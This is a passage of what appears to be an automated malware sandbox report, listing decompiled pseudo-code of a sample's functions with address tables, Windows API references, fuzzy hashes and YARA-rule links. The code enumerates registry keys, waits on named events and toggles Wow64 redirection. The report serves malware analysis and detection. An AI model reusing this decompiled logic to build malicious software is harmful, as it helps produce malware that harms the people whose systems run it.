									E04611F7A( *_t40, _t91, _a8,  *0x461a388, _a24); // executed
									_t43 = _t101 + 0x10; // 0x3d046190
									E04611F7A( *_t43, _t91, _a8,  *0x461a380, _a16);
								}
								if( *_t101 != 0) {
									E046150CA(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d046190, executed
					_t81 = E04616A36( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d046190
							E04615F2A(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E046150CA(_t100);
						_t98 = _a16;
					}
					E046150CA(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E046177A4(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x461a38c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

























                                0x04611d57
                                0x04611d60
                                0x04611d67
                                0x04611d6c
                                0x04611dd9
                                0x04611ddf
                                0x04611de4
                                0x04611deb
                                0x04611df2
                                0x04611df5
                                0x04611f60
                                0x04611f67
                                0x04611f67
                                0x04611f6c
                                0x04611f6e
                                0x04611f6e
                                0x04611f77
                                0x04611f77
                                0x04611dfb
                                0x04611e00
                                0x04611e07
                                0x04611f56
                                0x04611f59
                                0x00000000
                                0x04611f59
                                0x04611e0d
                                0x04611e12
                                0x04611e15
                                0x04611e1c
                                0x04611e1f
                                0x04611e68
                                0x04611e68
                                0x04611e7b
                                0x04611e7e
                                0x04611e85
                                0x04611e8d
                                0x04611e92
                                0x04611e9c
                                0x04611e9c
                                0x04611e94
                                0x04611e94
                                0x04611e94
                                0x04611e94
                                0x04611ebe
                                0x04611ec6
                                0x04611ef4
                                0x04611ef9
                                0x04611f00
                                0x04611f05
                                0x04611f09
                                0x04611f3b
                                0x04611f0b
                                0x04611f18
                                0x04611f1b
                                0x04611f2b
                                0x04611f2e
                                0x04611f34
                                0x04611f34
                                0x04611ec8
                                0x04611ed5
                                0x04611ed8
                                0x04611eea
                                0x04611eed
                                0x04611eed
                                0x04611f45
                                0x04611f51
                                0x04611f47
                                0x04611f4a
                                0x04611f4a
                                0x04611f45
                                0x04611ebe
                                0x00000000
                                0x04611e85
                                0x04611e2e
                                0x04611e31
                                0x04611e38
                                0x04611e3e
                                0x04611e41
                                0x04611e43
                                0x04611e4f
                                0x04611e52
                                0x04611e52
                                0x04611e58
                                0x04611e5d
                                0x04611e5d
                                0x04611e63
                                0x00000000
                                0x04611e63
                                0x04611d71
                                0x00000000
                                0x04611d98
                                0x04611d98
                                0x04611da4
                                0x04611db7
                                0x04611dbd
                                0x04611dc5
                                0x00000000
                                0x04611dc5

                                APIs
                                • StrChrA.SHLWAPI(046130C2,0000005F,00000000,00000000,00000104), ref: 04611D8A
                                • lstrcpy.KERNEL32(?,?), ref: 04611DB7
                                  • Part of subcall function 04614AA6: lstrlen.KERNEL32(?,00000000,053C9C98,74ECC740,046113D0,053C9E9D,046155DE,046155DE,?,046155DE,?,63699BC3,E8FA7DD7,00000000), ref: 04614AAD
                                  • Part of subcall function 04614AA6: mbstowcs.NTDLL ref: 04614AD6
                                  • Part of subcall function 04614AA6: memset.NTDLL ref: 04614AE8
                                  • Part of subcall function 04611F7A: lstrlenW.KERNEL32(?,?,?,04611F20,3D046190,80000002,046130C2,04614106,74666F53,4D4C4B48,04614106,?,3D046190,80000002,046130C2,?), ref: 04611F9F
                                  • Part of subcall function 046150CA: RtlFreeHeap.NTDLL(00000000,00000000,04614239,00000000,00000001,?,00000000,?,?,?,04616B8D,00000000,?,00000001), ref: 046150D6
                                • lstrcpy.KERNEL32(?,00000000), ref: 04611DD9
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                • String ID: ($\
                                • API String ID: 3924217599-1512714803
                                • Opcode ID: c9e3f5b5c33008be7521e058ede4a56fe4d4cd2916ed8cf7050b686a9c3a9854
                                • Instruction ID: 3e90b55e0365534e5de4dee5e955d431f6730edb3ce1de11ba62fa084ef966d0
                                • Opcode Fuzzy Hash: c9e3f5b5c33008be7521e058ede4a56fe4d4cd2916ed8cf7050b686a9c3a9854
                                • Instruction Fuzzy Hash: DA51387210020ABFDF219FA0DD40EEA7BB9EF5A314F08851AFA1592170F735E925EB14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04616BE1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                                Download Yara Rule
                                C-Code - Quality: 32%
                                			E04616BE1(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E04612902(_t29, __edi, __eax); // executed
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0x461a2d4; // 0xdad5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0x461b4c8; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0x461b8f8; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0x461a100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}
















                                0x04616be1
                                0x04616be8
                                0x04616bec
                                0x04616bf1
                                0x04616bf8
                                0x04616bfb
                                0x04616c05
                                0x04616c0a
                                0x04616c16
                                0x04616c1d
                                0x04616c27
                                0x04616c27
                                0x04616c1f
                                0x04616c1f
                                0x04616c1f
                                0x04616c1f
                                0x04616c2d
                                0x04616c30
                                0x04616c38
                                0x04616c3b
                                0x04616c3e
                                0x04616c41
                                0x04616c46
                                0x04616c4f
                                0x04616c5c
                                0x04616c51
                                0x04616c57
                                0x04616c57
                                0x04616c62
                                0x04616c62
                                0x04616c6a

                                APIs
                                  • Part of subcall function 04612902: SysAllocString.OLEAUT32(?), ref: 0461295E
                                  • Part of subcall function 04612902: SysAllocString.OLEAUT32(0070006F), ref: 04612972
                                  • Part of subcall function 04612902: SysAllocString.OLEAUT32(00000000), ref: 04612984
                                  • Part of subcall function 04612902: SysFreeString.OLEAUT32(00000000), ref: 046129E8
                                • memset.NTDLL ref: 04616C05
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 04616C41
                                • GetLastError.KERNEL32 ref: 04616C51
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 04616C62
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                                • String ID: <
                                • API String ID: 593937197-4251816714
                                • Opcode ID: ee9420ca986949f3f3ff5fcba2ed1cd2d367254f3a3aed919319936f6d89f97d
                                • Instruction ID: d5dfc9d2af9885e4202a22ecc16314f8bb962dc6329e63998ebc7dc3d47eeed8
                                • Opcode Fuzzy Hash: ee9420ca986949f3f3ff5fcba2ed1cd2d367254f3a3aed919319936f6d89f97d
                                • Instruction Fuzzy Hash: EC113CB5A00358AFDB00DFA5D885BD97BB8EB08790F08801AE905E7260F774E544CBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 046173C3, Relevance: 7.6, APIs: 5, Instructions: 92synchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E046173C3(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t18;
				long _t21;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x461a2c8; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0x461a2d4; // 0xdad5a8
				_t3 = _t8 + 0x461b8a2; // 0x61636f4c
				_t25 = 0;
				_t30 = E04612DEA(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x461a2f8, 1, 0, _t30);
					E046150CA(_t30);
				}
				_t12 =  *0x461a2b4; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 == 0) {
						goto L11;
					}
					_t18 = E0461513E(); // executed
					if(_t18 != 0) {
						goto L11;
					}
					_t28 = StrChrW( *_t32, 0x20);
					if(_t28 != 0) {
						 *_t28 =  *_t28 & 0x00000000;
						_t28 =  &(_t28[1]);
					}
					_t21 = E04616BE1(0, _t28,  *_t32, 0); // executed
					_t31 = _t21;
					if(_t31 == 0) {
						if(_t25 == 0) {
							goto L21;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							goto L19;
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E046151A8(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

















                                0x046173c4
                                0x046173cb
                                0x046173d5
                                0x046173d9
                                0x046173df
                                0x046173ec
                                0x046173f3
                                0x046173f7
                                0x04617409
                                0x0461740b
                                0x0461740b
                                0x04617410
                                0x04617417
                                0x04617422
                                0x00000000
                                0x00000000
                                0x04617424
                                0x0461742b
                                0x00000000
                                0x00000000
                                0x04617438
                                0x0461743c
                                0x0461743e
                                0x04617443
                                0x04617443
                                0x0461744b
                                0x04617450
                                0x04617454
                                0x04617458
                                0x00000000
                                0x00000000
                                0x04617466
                                0x0461746a
                                0x00000000
                                0x00000000
                                0x0461746a
                                0x00000000
                                0x0461746c
                                0x0461746c
                                0x0461746c
                                0x04617472
                                0x04617474
                                0x04617474
                                0x0461747e
                                0x04617482
                                0x04617494
                                0x04617494
                                0x04617498
                                0x0461749e
                                0x0461749e
                                0x046174a1
                                0x046174a3
                                0x046174a6
                                0x046174a6
                                0x046174ad
                                0x046174b3
                                0x046174b3

                                APIs
                                  • Part of subcall function 04612DEA: lstrlen.KERNEL32(E8FA7DD7,00000000,63699BC3,00000027,00000000,053C9C98,74ECC740,046155DE,?,63699BC3,E8FA7DD7,00000000,?,?,?,046155DE), ref: 04612E20
                                  • Part of subcall function 04612DEA: lstrcpy.KERNEL32(00000000,00000000), ref: 04612E44
                                  • Part of subcall function 04612DEA: lstrcat.KERNEL32(00000000,00000000), ref: 04612E4C
                                • CreateEventA.KERNEL32(0461A2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,046130E1,?,?,?), ref: 04617402
                                  • Part of subcall function 046150CA: RtlFreeHeap.NTDLL(00000000,00000000,04614239,00000000,00000001,?,00000000,?,?,?,04616B8D,00000000,?,00000001), ref: 046150D6
                                • StrChrW.SHLWAPI(046130E1,00000020,61636F4C,00000001,00000000,?,?,00000000,?,046130E1,?,?,?), ref: 04617432
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,046130E1,00000000,?,00000000,?,046130E1,?,?,?,?,?,?,?,0461211B), ref: 04617460
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,046130E1,?,?,?), ref: 0461748E
                                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,046130E1,?,?,?), ref: 046174A6
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 73268831-0
                                • Opcode ID: 739d1ada9cbbc817a50ba50b329db6375b172ecb3d9041d7e19972a2eefcc772
                                • Instruction ID: 5bce21483f8a4c275b1ff09c401f41b6286d23521d0ac26243f64f95cb25751a
                                • Opcode Fuzzy Hash: 739d1ada9cbbc817a50ba50b329db6375b172ecb3d9041d7e19972a2eefcc772
                                • Instruction Fuzzy Hash: E621F632A013126BD7215FA88C44B577AE8EF58B66F0D4229FD029B371F774FC048644
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04615C35, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(80000002), ref: 04615C8C
                                • SysAllocString.OLEAUT32(04611E05), ref: 04615CCF
                                • SysFreeString.OLEAUT32(00000000), ref: 04615CE3
                                • SysFreeString.OLEAUT32(00000000), ref: 04615CF1
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: c74bb2cff5a6bfd50a673646d6635b0f783a51b503dd3809dec676254c8b8eb5
                                • Instruction ID: da8165eb4bb18ccd0908f5e651e5c34fd975aa15f478f2c045506da9d9eebce7
                                • Opcode Fuzzy Hash: c74bb2cff5a6bfd50a673646d6635b0f783a51b503dd3809dec676254c8b8eb5
                                • Instruction Fuzzy Hash: 49310AB1900149FFCB05DF98D4848EEBBF5FF98340B18842EE50697221E735A945CFA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04614039, Relevance: 6.1, APIs: 4, Instructions: 98registrysynchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04614039(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E04616837(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32); // executed
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E046150CA(_v28);
							goto L17;
						}
						_t42 = E04611D57(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E046150CA(_v24);
						_v20 = _v16;
						_t47 = E04616837(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x461a2c4, 0) == 0x102);
				goto L16;
			}

















                                0x04614039
                                0x04614053
                                0x04614056
                                0x04614059
                                0x0461405c
                                0x0461405f
                                0x04614065
                                0x04614069
                                0x04614143
                                0x04614147
                                0x04614147
                                0x04614072
                                0x04614079
                                0x04614080
                                0x04614083
                                0x04614138
                                0x0461413b
                                0x00000000
                                0x04614141
                                0x04614089
                                0x0461408c
                                0x04614093
                                0x0461409d
                                0x046140a6
                                0x046140ac
                                0x046140b4
                                0x046140ec
                                0x04614126
                                0x0461412c
                                0x0461412e
                                0x0461412e
                                0x04614130
                                0x04614133
                                0x00000000
                                0x04614133
                                0x04614101
                                0x04614106
                                0x0461410a
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0461410a
                                0x046140b9
                                0x046140c8
                                0x00000000
                                0x00000000
                                0x046140cd
                                0x046140d6
                                0x046140d9
                                0x046140e0
                                0x046140e3
                                0x046140be
                                0x046140be
                                0x00000000
                                0x046140be
                                0x046140e7
                                0x00000000
                                0x046140e7
                                0x046140bb
                                0x00000000
                                0x0461410c
                                0x04614119
                                0x00000000

                                APIs
                                • RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,046130C2,?), ref: 0461405F
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                • RegEnumKeyExA.KERNELBASE(?,?,?,046130C2,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,046130C2), ref: 046140A6
                                • WaitForSingleObject.KERNEL32(00000000,?,?,?,046130C2,?,046130C2,?,?,?,?,?,046130C2,?), ref: 04614113
                                • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,046130C2,?,?,?,?,?,0461211B,?), ref: 0461413B
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                                • String ID:
                                • API String ID: 3664505660-0
                                • Opcode ID: dfc0adea2da2660be1425a849a4e7035e9c5825f7b97191d7c9685d95cddd7c3
                                • Instruction ID: 62a36709955338e5a37628b76b0e96d4d572fb03c8c691a47fb3654462ded02a
                                • Opcode Fuzzy Hash: dfc0adea2da2660be1425a849a4e7035e9c5825f7b97191d7c9685d95cddd7c3
                                • Instruction Fuzzy Hash: 4E319A71D00129EBCF21AFE5CC459FEFFB9EBA5311F18406AE510B3260E6745A80DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04613032, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                Download Yara Rule
                                C-Code - Quality: 41%
                                			E04613032(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E04616710(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E046115B9(_t23);
						}
					}
					return _t38;
				}
				_t26 = E04614C8C(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x461a2f8, 1, 0,  *0x461a394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					FindCloseChangeNotification(_t40); // executed
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04614039(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E04611D57(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04613C84(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E046173C3( &_v32, _t39);
					goto L13;
				}
			}














                                0x04613032
                                0x0461303f
                                0x04613045
                                0x04613046
                                0x04613047
                                0x04613048
                                0x04613049
                                0x0461304d
                                0x04613054
                                0x04613059
                                0x0461305d
                                0x046130e5
                                0x046130e5
                                0x046130e8
                                0x046130ea
                                0x046130f2
                                0x046130f8
                                0x046130fb
                                0x046130fb
                                0x046130f8
                                0x04613106
                                0x04613106
                                0x04613069
                                0x04613070
                                0x04613072
                                0x04613072
                                0x04613089
                                0x0461308d
                                0x04613090
                                0x0461309b
                                0x046130a2
                                0x046130a2
                                0x046130ae
                                0x046130af
                                0x046130bd
                                0x046130b1
                                0x046130b1
                                0x046130b2
                                0x046130b3
                                0x046130b4
                                0x046130b5
                                0x046130b6
                                0x046130b6
                                0x046130c2
                                0x046130c7
                                0x046130c9
                                0x046130cb
                                0x046130cb
                                0x046130d2
                                0x00000000
                                0x046130d4
                                0x046130d4
                                0x046130e1
                                0x00000000
                                0x046130e1

                                APIs
                                • CreateEventA.KERNEL32(0461A2F8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730,?,?,?,?,0461211B,?,00000001), ref: 04613083
                                • SetEvent.KERNEL32(00000000,?,?,?,?,0461211B,?,00000001,0461560C,00000002,?,?,0461560C), ref: 04613090
                                • Sleep.KERNELBASE(00000BB8,?,?,?,?,0461211B,?,00000001,0461560C,00000002,?,?,0461560C), ref: 0461309B
                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,0461211B,?,00000001,0461560C,00000002,?,?,0461560C), ref: 046130A2
                                  • Part of subcall function 04614039: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,046130C2,?), ref: 0461405F
                                  • Part of subcall function 04614039: RegEnumKeyExA.KERNELBASE(?,?,?,046130C2,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,046130C2), ref: 046140A6
                                  • Part of subcall function 04614039: WaitForSingleObject.KERNEL32(00000000,?,?,?,046130C2,?,046130C2,?,?,?,?,?,046130C2,?), ref: 04614113
                                  • Part of subcall function 04614039: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,046130C2,?,?,?,?,?,0461211B,?), ref: 0461413B
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseEvent$ChangeCreateEnumFindNotificationObjectOpenSingleSleepWait
                                • String ID:
                                • API String ID: 780868161-0
                                • Opcode ID: e6f8a228859852db00157472b2d62fb14996ceab41074707cc95d8f983d73bd9
                                • Instruction ID: 3dc8181faaf1690d1d7042a055aca8159a3d19f0d2b2b31d9dc49094725398ac
                                • Opcode Fuzzy Hash: e6f8a228859852db00157472b2d62fb14996ceab41074707cc95d8f983d73bd9
                                • Instruction Fuzzy Hash: B9218872900214ABEB10AFE584849DE77BDAB04351B0D442AED12E7320FB35F985C761
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04616A36, Relevance: 6.1, APIs: 4, Instructions: 80registryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04616A36(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E04616837(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E046150CA(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12); // executed
					}
					L12:
					return _t43;
				}
				_t43 = E04614323(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}







                                0x04616a42
                                0x04616a65
                                0x04616a6f
                                0x04616a75
                                0x04616a79
                                0x04616a91
                                0x04616a96
                                0x04616ade
                                0x04616a98
                                0x04616aa0
                                0x04616aa4
                                0x04616adb
                                0x04616aa6
                                0x04616ab8
                                0x04616abc
                                0x04616ad2
                                0x04616abe
                                0x04616ac1
                                0x04616ac3
                                0x04616ac8
                                0x04616acd
                                0x04616acd
                                0x04616ac8
                                0x04616abc
                                0x04616aa4
                                0x04616ae6
                                0x04616ae6
                                0x04616aed
                                0x04616af3
                                0x04616af3
                                0x04616a5b
                                0x04616a5f
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • RegOpenKeyW.ADVAPI32(80000002,053C9D8C,053C9D8C), ref: 04616A6F
                                • RegQueryValueExW.KERNELBASE(053C9D8C,?,00000000,80000002,00000000,00000000,?,04611E36,3D046190,80000002,046130C2,00000000,046130C2,?,053C9D8C,80000002), ref: 04616A91
                                • RegQueryValueExW.ADVAPI32(053C9D8C,?,00000000,80000002,00000000,00000000,00000000,?,04611E36,3D046190,80000002,046130C2,00000000,046130C2,?,053C9D8C), ref: 04616AB6
                                • RegCloseKey.KERNELBASE(053C9D8C,?,04611E36,3D046190,80000002,046130C2,00000000,046130C2,?,053C9D8C,80000002,00000000,?), ref: 04616AE6
                                  • Part of subcall function 04614323: SafeArrayDestroy.OLEAUT32(00000000), ref: 046143A8
                                  • Part of subcall function 046150CA: RtlFreeHeap.NTDLL(00000000,00000000,04614239,00000000,00000001,?,00000000,?,?,?,04616B8D,00000000,?,00000001), ref: 046150D6
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                                • String ID:
                                • API String ID: 486277218-0
                                • Opcode ID: af8fd032159088eb2993557bad76c8fbd94ec68e78001c02d544a7f0acb59e1e
                                • Instruction ID: 3e051c132e5378b6f80aa7009b42deb08920caf5ce2c244fbb3cc5afce1265ee
                                • Opcode Fuzzy Hash: af8fd032159088eb2993557bad76c8fbd94ec68e78001c02d544a7f0acb59e1e
                                • Instruction Fuzzy Hash: 0421097650015DBFDF11AE94DC80CEE7B69EB08355B08802AFE1597230E672ED65DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04614D09, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 78%
                                			E04614D09(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
